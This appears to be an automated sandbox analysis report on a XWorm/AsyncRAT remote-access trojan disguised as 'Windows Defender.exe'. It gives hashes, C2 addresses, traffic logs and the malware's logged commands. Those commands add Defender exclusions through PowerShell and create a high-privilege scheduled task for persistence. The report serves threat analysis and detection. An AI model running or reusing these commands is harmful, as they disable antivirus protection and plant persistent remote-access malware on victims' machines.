SALSGIVERUS | e7WMhx18XN.exe | Get hash | malicious | SilentXMRMiner, Xmrig | Browse | 147.185.221.22
SALSGIVERUS | SecuriteInfo.com.Trojan.MulDrop28.25270.15094.4444.exe | Get hash | malicious | Njrat | Browse | 147.185.221.22
SALSGIVERUS | 1c8DbXc5r0.exe | Get hash | malicious | XWorm | Browse | 147.185.221.18
SALSGIVERUS | PixpFUv4G7.exe | Get hash | malicious | Quasar, XWorm | Browse | 147.185.221.21
SALSGIVERUS | H2f8SkAvdV.exe | Get hash | malicious | Blank Grabber, XWorm | Browse | 147.185.221.23
SALSGIVERUS | A39tzaySzX.exe | Get hash | malicious | AsyncRAT, XWorm | Browse | 147.185.221.23
SALSGIVERUS | Bpz46JayQ4.exe | Get hash | malicious | XWorm | Browse | 147.185.221.22
SALSGIVERUS | e4L9TXRBhB.exe | Get hash | malicious | XWorm | Browse | 147.185.221.22
SALSGIVERUS | H1N45BQJ8x.exe | Get hash | malicious | XWorm | Browse | 147.185.221.23
                                    No context
                                    No context
                                    Process:C:\Users\user\AppData\Local\Windows Defender.exe
                                    File Type:CSV text
                                    Category:dropped
                                    Size (bytes):654
                                    Entropy (8bit):5.380476433908377
                                    Encrypted:false
                                    SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                    MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                    SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                    SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                    SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                    Malicious:true
                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:modified
                                    Size (bytes):64
                                    Entropy (8bit):0.34726597513537405
                                    Encrypted:false
                                    SSDEEP:3:Nlll:Nll
                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                    Malicious:false
                                    Preview:@...e...........................................................
                                    Process:C:\Users\user\Desktop\Windows Defender.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):41
                                    Entropy (8bit):3.7195394315431693
                                    Encrypted:false
                                    SSDEEP:3:rRSFYJKXzovNsr4rNrn:EFYJKDoWrcBn
                                    MD5:0DB526D48DAB0E640663E4DC0EFE82BA
                                    SHA1:17AC435DAFEA6FF9F4D6F83FA6C54F9800F43724
                                    SHA-256:934290A76F9E1804069D8ED6515B14101D9D8ABA2EACBF5B260F59941C65340E
                                    SHA-512:FACD013E1B5B8163214CA8C3A18ADEEC3541153CD69240EEFA76DDD54809186E919C1D635AEA648A8641DE7C3216BEC11C41F04719B60F07EDFDC01FF79027B9
                                    Malicious:false
                                    Preview:....### explorer ###..[WIN]r[WIN]r[WIN]r
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Users\user\Desktop\Windows Defender.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):87552
                                    Entropy (8bit):5.981787823477636
                                    Encrypted:false
                                    SSDEEP:1536:+RWb0LuvJ1F1ZhZYJAlMK9iQbRcd44gQp3vACo6ecOPoXaPJ:680Lihu+MmiQbRcd7/L4cOPoXwJ
                                    MD5:E9FF85404CBD9C9DF15E13D0E4B960B1
                                    SHA1:3269C423EBC616270BF713010B3C87976D07D06A
                                    SHA-256:576D63BF309D5FB80B9D2683B21B8257D60DD2A8FA4974982D38EBFACE89FC47
                                    SHA-512:7468AEB3D286C7D47DB80221C13B8A22D886566611E4A0C4F924E9B7CCA3B9E95C0F1FAAA071ABA2A60E9E4EB1022C6650ACB4D3A0547293910010A502393098
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Windows Defender.exe, Author: Joe Security
                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Windows Defender.exe, Author: Joe Security
                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Windows Defender.exe, Author: ditekSHen
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 82%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...AN.f.................&...........E... ...`....@.. ....................................@..................................D..O....`..B+........................................................................... ............... ..H............text....%... ...&.................. ..`.rsrc...B+...`...,...(..............@..@.reloc...............T..............@..B.................D......H........c..........&.....................................................(....*.r...p*. *p{.*..(....*.r...p*. .O..*.s.........s.........s.........s.........*.rc..p*. ...*.r...p*. .%..*.r...p*. X...*.rL..p*. .g..*.r...p*. ..e.*..((...*.r...p*. .(T.*.r+..p*. ..<.*.(+...-.(,...,.+.(-...,.+.(*...,.+.()...,..(Z...*"(....+.*&(....&+.*.+5sk... .... .'..ol...(,...~....-.(_...(Q...~....om...&.-.*.r...p*.r...p*. .5..*.r$..p*. G...*.r...p*. ~.H.*.rj..p*. .L..*.r...p*. .x!.*.r...p*. .^
                                    Process:C:\Users\user\Desktop\Windows Defender.exe
                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Oct 8 11:03:17 2024, mtime=Tue Oct 8 11:03:17 2024, atime=Tue Oct 8 11:03:17 2024, length=87552, window=hide
                                    Category:dropped
                                    Size (bytes):1009
                                    Entropy (8bit):5.059533917548522
                                    Encrypted:false
                                    SSDEEP:24:88bY/0bDZt8lXJtHXuRC3GuSA8aOE47OcQ7qygm:8T/0bDAl7eR495Ojhyg
                                    MD5:22D18BA7C4BB61AB966C4278B4A96DAD
                                    SHA1:93DAA71017BCACE30598F9B1FD4D686EE5316ED4
                                    SHA-256:54B862B0DFA28249F62DD30B3F7D0BAF29C2723B31D504E6C16AF3FD6FBA27D6
                                    SHA-512:C8AD285037DDFAD43186C5158DB14B67A0D1EF0FDED5802B81F7EF2F48CCF9C5B4B40028B0640A1D6F8D394687124E3B3DFA4738FDF70C82B708E4931A4A2969
                                    Malicious:false
                                    Preview:L..................F.... ....`V.z...,K..z....`V.z....V........................:..DG..Yr?.D..U..k0.&...&.......$..S...(.>.y.....w.z.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2HYE`...........................^.A.p.p.D.a.t.a...B.P.1.....HYC`..Local.<......EW<2HYE`....[.....................aP..L.o.c.a.l.....v.2..V..HYi` .WINDOW~1.EXE..Z......HYi`HYi`....).....................jf..W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r...e.x.e.......c...............-.......b............r3~.....C:\Users\user\AppData\Local\Windows Defender.exe..,.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r...e.x.e.............:...........|....I.J.H..K..:...`.......X.......530978...........hT..CrF.f4... ..`\9m....-...-$..hT..CrF.f4... ..`\9m....-...-$.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3.........9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?.......
                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Entropy (8bit):5.981787823477636
                                    TrID:
                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                    • Win32 Executable (generic) a (10002005/4) 49.75%
                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                    • Windows Screen Saver (13104/52) 0.07%
                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                    File name:Windows Defender.exe
                                    File size:87'552 bytes
                                    MD5:e9ff85404cbd9c9df15e13d0e4b960b1
                                    SHA1:3269c423ebc616270bf713010b3c87976d07d06a
                                    SHA256:576d63bf309d5fb80b9d2683b21b8257d60dd2a8fa4974982d38ebface89fc47
                                    SHA512:7468aeb3d286c7d47db80221c13b8a22d886566611e4a0c4f924e9b7cca3b9e95c0f1faaa071aba2a60e9e4eb1022c6650acb4d3a0547293910010a502393098
                                    SSDEEP:1536:+RWb0LuvJ1F1ZhZYJAlMK9iQbRcd44gQp3vACo6ecOPoXaPJ:680Lihu+MmiQbRcd7/L4cOPoXwJ
                                    TLSH:1A833A3867D4F419D1FE56BDC8A132F28678ADD7DC02821FDC853D863632AE489316E9
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...AN.f.................&...........E... ...`....@.. ....................................@................................
                                    Icon Hash:0fe88cec4c6d2b0e
                                    Entrypoint:0x41450e
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x66F04E41 [Sun Sep 22 17:05:05 2024 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:4
                                    OS Version Minor:0
                                    File Version Major:4
                                    File Version Minor:0
                                    Subsystem Version Major:4
                                    Subsystem Version Minor:0
                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                    Instruction
                                    jmp dword ptr [00402000h]
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    Name | Virtual Address | Virtual Size | Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_IMPORT | 0x144bc | 0x4f | .text
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x16000 | 0x2b42 | .rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x1a000 | 0xc | .reloc
                                    IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                    Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                    .text | 0x2000 | 0x12514 | 0x12600 | ae2e374800c8c90b2ff67d40ea44669c | False | 0.6112749787414966 | SysEx File - Casio | 6.131632657995026 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .rsrc | 0x16000 | 0x2b42 | 0x2c00 | 5d5b33972a709c9e5929372654fc5d92 | False | 0.12908380681818182 | data | 2.5681418743518893 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .reloc | 0x1a000 | 0xc | 0x200 | a5a3ecb3b21c5366d6ed47ea556ef582 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                    Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                    RT_ICON | 0x16130 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | | | 0.08246887966804979
                                    RT_GROUP_ICON | 0x186d8 | 0x14 | data | | | 1.1
                                    RT_VERSION | 0x186ec | 0x26c | data | | | 0.4596774193548387
                                    RT_MANIFEST | 0x18958 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5469387755102041
                                    DLL | Import
                                    mscoree.dll | _CorExeMain
                                    Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                    2024-10-08T14:03:37.561657+0200 | 2853957 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.6 | 49989 | 147.185.221.22 | 54699 | TCP
                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                    Oct 8, 2024 14:02:16.956760883 CEST | 49743 | 80 | 192.168.2.6 | 208.95.112.1
                                    Oct 8, 2024 14:02:16.961703062 CEST | 80 | 49743 | 208.95.112.1 | 192.168.2.6
                                    Oct 8, 2024 14:02:16.961818933 CEST | 49743 | 80 | 192.168.2.6 | 208.95.112.1
                                    Oct 8, 2024 14:02:16.962527037 CEST | 49743 | 80 | 192.168.2.6 | 208.95.112.1
                                    Oct 8, 2024 14:02:16.967447042 CEST | 80 | 49743 | 208.95.112.1 | 192.168.2.6
                                    Oct 8, 2024 14:02:17.429711103 CEST | 80 | 49743 | 208.95.112.1 | 192.168.2.6
                                    Oct 8, 2024 14:02:17.479492903 CEST | 49743 | 80 | 192.168.2.6 | 208.95.112.1
                                    Oct 8, 2024 14:03:23.315824986 CEST | 49989 | 54699 | 192.168.2.6 | 147.185.221.22
                                    Oct 8, 2024 14:03:23.320900917 CEST | 54699 | 49989 | 147.185.221.22 | 192.168.2.6
                                    Oct 8, 2024 14:03:23.320981979 CEST | 49989 | 54699 | 192.168.2.6 | 147.185.221.22
                                    Oct 8, 2024 14:03:23.375153065 CEST | 49989 | 54699 | 192.168.2.6 | 147.185.221.22
                                    Oct 8, 2024 14:03:23.380176067 CEST | 54699 | 49989 | 147.185.221.22 | 192.168.2.6
                                    Oct 8, 2024 14:03:37.561656952 CEST | 49989 | 54699 | 192.168.2.6 | 147.185.221.22
                                    Oct 8, 2024 14:03:37.567859888 CEST | 54699 | 49989 | 147.185.221.22 | 192.168.2.6
                                    Oct 8, 2024 14:03:44.687972069 CEST | 54699 | 49989 | 147.185.221.22 | 192.168.2.6
                                    Oct 8, 2024 14:03:44.688139915 CEST | 49989 | 54699 | 192.168.2.6 | 147.185.221.22
                                    Oct 8, 2024 14:03:46.589091063 CEST | 49989 | 54699 | 192.168.2.6 | 147.185.221.22
                                    Oct 8, 2024 14:03:46.590886116 CEST | 49991 | 54699 | 192.168.2.6 | 147.185.221.22
                                    Oct 8, 2024 14:03:46.786158085 CEST | 54699 | 49989 | 147.185.221.22 | 192.168.2.6
                                    Oct 8, 2024 14:03:46.786201000 CEST | 54699 | 49991 | 147.185.221.22 | 192.168.2.6
                                    Oct 8, 2024 14:03:46.786468983 CEST | 49991 | 54699 | 192.168.2.6 | 147.185.221.22
                                    Oct 8, 2024 14:03:46.818416119 CEST | 49991 | 54699 | 192.168.2.6 | 147.185.221.22
                                    Oct 8, 2024 14:03:46.823528051 CEST | 54699 | 49991 | 147.185.221.22 | 192.168.2.6
                                    Oct 8, 2024 14:03:57.434212923 CEST | 49743 | 80 | 192.168.2.6 | 208.95.112.1
                                    Oct 8, 2024 14:03:57.439575911 CEST | 80 | 49743 | 208.95.112.1 | 192.168.2.6
                                    Oct 8, 2024 14:03:57.439711094 CEST | 49743 | 80 | 192.168.2.6 | 208.95.112.1
                                    Oct 8, 2024 14:03:58.920809031 CEST | 49991 | 54699 | 192.168.2.6 | 147.185.221.22
                                    Oct 8, 2024 14:03:58.925635099 CEST | 54699 | 49991 | 147.185.221.22 | 192.168.2.6
                                    Oct 8, 2024 14:04:08.192418098 CEST | 54699 | 49991 | 147.185.221.22 | 192.168.2.6
                                    Oct 8, 2024 14:04:08.192564964 CEST | 49991 | 54699 | 192.168.2.6 | 147.185.221.22
                                    Oct 8, 2024 14:04:09.057712078 CEST | 49991 | 54699 | 192.168.2.6 | 147.185.221.22
                                    Oct 8, 2024 14:04:09.059654951 CEST | 49993 | 54699 | 192.168.2.6 | 147.185.221.22
                                    Oct 8, 2024 14:04:09.063049078 CEST | 54699 | 49991 | 147.185.221.22 | 192.168.2.6
                                    Oct 8, 2024 14:04:09.064639091 CEST | 54699 | 49993 | 147.185.221.22 | 192.168.2.6
                                    Oct 8, 2024 14:04:09.064721107 CEST | 49993 | 54699 | 192.168.2.6 | 147.185.221.22
                                    Oct 8, 2024 14:04:09.103039980 CEST | 49993 | 54699 | 192.168.2.6 | 147.185.221.22
                                    Oct 8, 2024 14:04:09.108041048 CEST | 54699 | 49993 | 147.185.221.22 | 192.168.2.6
                                    Oct 8, 2024 14:04:20.167112112 CEST | 49993 | 54699 | 192.168.2.6 | 147.185.221.22
                                    Oct 8, 2024 14:04:20.172275066 CEST | 54699 | 49993 | 147.185.221.22 | 192.168.2.6
                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                    Oct 8, 2024 14:02:16.943597078 CEST | 53731 | 53 | 192.168.2.6 | 1.1.1.1
                                    Oct 8, 2024 14:02:16.951306105 CEST | 53 | 53731 | 1.1.1.1 | 192.168.2.6
                                    Oct 8, 2024 14:03:23.298361063 CEST | 58580 | 53 | 192.168.2.6 | 1.1.1.1
                                    Oct 8, 2024 14:03:23.311382055 CEST | 53 | 58580 | 1.1.1.1 | 192.168.2.6
                                    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                    Oct 8, 2024 14:02:16.943597078 CEST | 192.168.2.6 | 1.1.1.1 | 0x5102 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
                                    Oct 8, 2024 14:03:23.298361063 CEST | 192.168.2.6 | 1.1.1.1 | 0x62c | Standard query (0) | 22.ip.gl.ply.gg | A (IP address) | IN (0x0001) | false
                                    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                    Oct 8, 2024 14:02:11.035805941 CEST | 1.1.1.1 | 192.168.2.6 | 0xc98 | No error (0) | shed.dual-low.s-part-0017.t-0009.t-msedge.net | s-part-0017.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
                                    Oct 8, 2024 14:02:11.035805941 CEST | 1.1.1.1 | 192.168.2.6 | 0xc98 | No error (0) | s-part-0017.t-0009.t-msedge.net | | 13.107.246.45 | A (IP address) | IN (0x0001) | false
                                    Oct 8, 2024 14:02:16.951306105 CEST | 1.1.1.1 | 192.168.2.6 | 0x5102 | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
                                    Oct 8, 2024 14:03:23.311382055 CEST | 1.1.1.1 | 192.168.2.6 | 0x62c | No error (0) | 22.ip.gl.ply.gg | | 147.185.221.22 | A (IP address) | IN (0x0001) | false
                                    • ip-api.com
                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    0 | 192.168.2.6 | 49743 | 208.95.112.1 | 80 | 4144 | C:\Users\user\Desktop\Windows Defender.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Oct 8, 2024 14:02:16.962527037 CEST | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
                                    Host: ip-api.com
                                    Connection: Keep-Alive
                                    Oct 8, 2024 14:02:17.429711103 CEST | 175 | IN | HTTP/1.1 200 OK
                                    Date: Tue, 08 Oct 2024 12:02:16 GMT
                                    Content-Type: text/plain; charset=utf-8
                                    Content-Length: 6
                                    Access-Control-Allow-Origin: *
                                    X-Ttl: 60
                                    X-Rl: 44
                                    Data Raw: 66 61 6c 73 65 0a
                                    Data Ascii: false



                                    Target ID:0
                                    Start time:08:02:11
                                    Start date:08/10/2024
                                    Path:C:\Users\user\Desktop\Windows Defender.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Users\user\Desktop\Windows Defender.exe"
                                    Imagebase:0xad0000
                                    File size:87'552 bytes
                                    MD5 hash:E9FF85404CBD9C9DF15E13D0E4B960B1
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.3487954673.0000000012EA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.3487954673.0000000012EA1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.3482001337.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.2229425020.0000000000AD2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.2229425020.0000000000AD2000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                    Reputation:low
                                    Has exited:false

                                    Target ID:2
                                    Start time:08:02:16
                                    Start date:08/10/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Windows Defender.exe'
                                    Imagebase:0x7ff6e3d50000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:3
                                    Start time:08:02:16
                                    Start date:08/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:5
                                    Start time:08:02:25
                                    Start date:08/10/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Defender.exe'
                                    Imagebase:0x7ff6e3d50000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:6
                                    Start time:08:02:25
                                    Start date:08/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:9
                                    Start time:08:02:35
                                    Start date:08/10/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Windows Defender.exe'
                                    Imagebase:0x7ff6e3d50000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:10
                                    Start time:08:02:35
                                    Start date:08/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:11
                                    Start time:08:02:52
                                    Start date:08/10/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Defender.exe'
                                    Imagebase:0x7ff6e3d50000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:12
                                    Start time:08:02:52
                                    Start date:08/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:16
                                    Start time:08:03:17
                                    Start date:08/10/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Defender" /tr "C:\Users\user\AppData\Local\Windows Defender.exe"
                                    Imagebase:0x7ff6885d0000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:17
                                    Start time:08:03:17
                                    Start date:08/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:18
                                    Start time:08:03:17
